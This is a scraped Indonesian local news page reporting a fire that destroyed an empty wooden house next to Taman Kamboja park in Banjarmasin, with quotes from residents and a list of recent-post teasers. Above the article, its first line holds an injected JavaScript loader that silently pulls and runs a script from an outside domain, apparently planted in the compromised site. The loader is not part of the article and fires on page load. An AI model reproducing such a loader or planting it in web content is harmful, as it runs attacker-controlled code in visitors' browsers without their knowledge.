(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarmasin

Rumah Tak Berpenghuni Samping RTH Kamboja Terbakar


KANALKALIMANTAN.COM, BANJARMASIN – Warga sekitar Jalan Anang Adenansi, Kecamatan Banjarmasin Tengah, Kota Banjarmasin dikejutkan dengan kobaran api yang muncul pada bangunan rumah kosong, Jumat (10/11/2023) siang.

Rumah yang tidak diketahui pemiliknya itu dikabarkan terbakar sekitar pukul 10.30 Wita. Tidak sampai 30 menit, api sudah meluluhlantakkan seluruh sisi bangunan yang terbuat dari kayu.

Reza, warga sekitar kejadian mengaku terkejut ketika melihat api disertai asap tebal muncul pada bangunan yang hanya terpisah dinding beton dengan kawasan RTH Taman Kamboja Banjarmasin.

Pemuda ini juga mengaku sempat mengambil rekaman video detik-detik api membesar dan melaporkannya ke grub pemadam kebakaran Banjarmasin untuk meminta bantuan.

Baca juga: Kasus Cuci Uang Narkoba Ayah Fredy Pratama Ditangani Jaksa Kasus Ferdy Sambo

“Ulun (saya) memvideo jam 10.33 saat itu api sudah ganal (besar),” katanya dengan pakaian basah kuyup usai ikut berjibaku memadamkan api.

Beruntung, dalam kejadian kebakaran tersebut tidak terdapat korban jiwa sebab rumah yang terbakar dalam kondisi kosong alias tidak berpenghuni.

“Yang terbakar ini rumah kosong sudah bertahun-tahun, dua rumah berdempetan, kata Reza saat ditemui di lokasi kebakaran, Jumat (10/11/2023) siang.

Baca juga: Diduga Berawal Pesan WhatsApp Mesra, Seorang Pemuda Diperas hingga Rp14 Juta

Pantauan Kanalkalimantan.com di lokasi sekitar rumah kosong yang terbakar banyak ditumbuhi tanaman liar. Tidak jauh dari rumah kosong itu terdapat beberapa rumah penduduk.

Rupanya, api yang berasal sari rumah kosong itu sempat merembet ke rumah penduduk. Aibatnya dua buah rumah lainnya juga ikut terbakar meski skala kecil.

Api juga nyaris membakar warung makan Amang Jani yang berada di kawasan RTH Taman Kamboja. Beruntung api dapat cepat dikuasai puluhan tim pemadam sehingga tidak sampai merembet ke warung yang juga dijadikan tempat tinggal tersebut.

Baca juga: Presiden Jokowi Resmikan PLTS Terapung Cirata 192 MWp, Terbesar di Asia Tenggara

“Apinya parak (hampir) sampai ke dapur tadi,” kata perempuan penjaga warung yang nampak masih panik.

Belum diketahui penyebab kebakaran, sementara bangunan yang sudah tinggal arang itu sudah dipasangi garis polisi. (Kanalkalimantan.com/rizki)

Reporter : rizki
Editor : bie


Risa

Recent Posts

Orangtua Pusing, ‘Bermewah-mewahan’ Perpisahan Anak Sekolah di Banjarbaru

Kadisdik: Silakan Perpisahan di Sekolah dan Dilakukan dengan Sederhana Read More

8 jam ago

Bappedalitbang Banjar Gelar Rapat Pembahasan Data Indikator Makro Pembangunan RPJPD

KANALKALIMANTAN.COM, MARTAPURA – Badan Perencanaan Pembangunan Daerah, Penelitian dan Pengembangan (Bappedalitbang) Kabupaten Banjar melaksanakan rapat Pembahasan… Read More

8 jam ago

Pergantian Perwira di Polres Banjarmasin, Ini Nama dan Jabatannya

KANALKALIMANTAN.COM, BANJARMASIN - Sejumlah perwira menengah (Pamen) dan perwira pertama (Pama) di lingkungan Kepolisian Resor… Read More

8 jam ago

O2SN dan FLS2N 2024 SD MI Tingkat Kabupaten Kapuas Digelar

KANALKALIMANTAN.COM, KUALA KAPUAS - Ratusan pelajar tingkat SD/MI di Kabupaten Kapuas antusias mengikuti upacara pembukaan… Read More

8 jam ago

Bangun Posyandu di Lokasi TMMD Desa Sungai Karias

KANALKALIMANTAN.COM, AMUNTAI - Pembangunan Pos Pelayanan Terpadu (Posyandu) tak luput dari sasaran Satgas TNI Manunggal… Read More

9 jam ago

Kelurahan Guntung Manggis Membidik Juara Kampung Keluarga Berkualitas Nasional

KANALKALIMANTAN.COM, BANJARBARU - Kampung Keluarga Berkualitas (KB) di Kelurahan Guntung Manggis menerima kunjungan Tim Penilai… Read More

9 jam ago

This website uses cookies.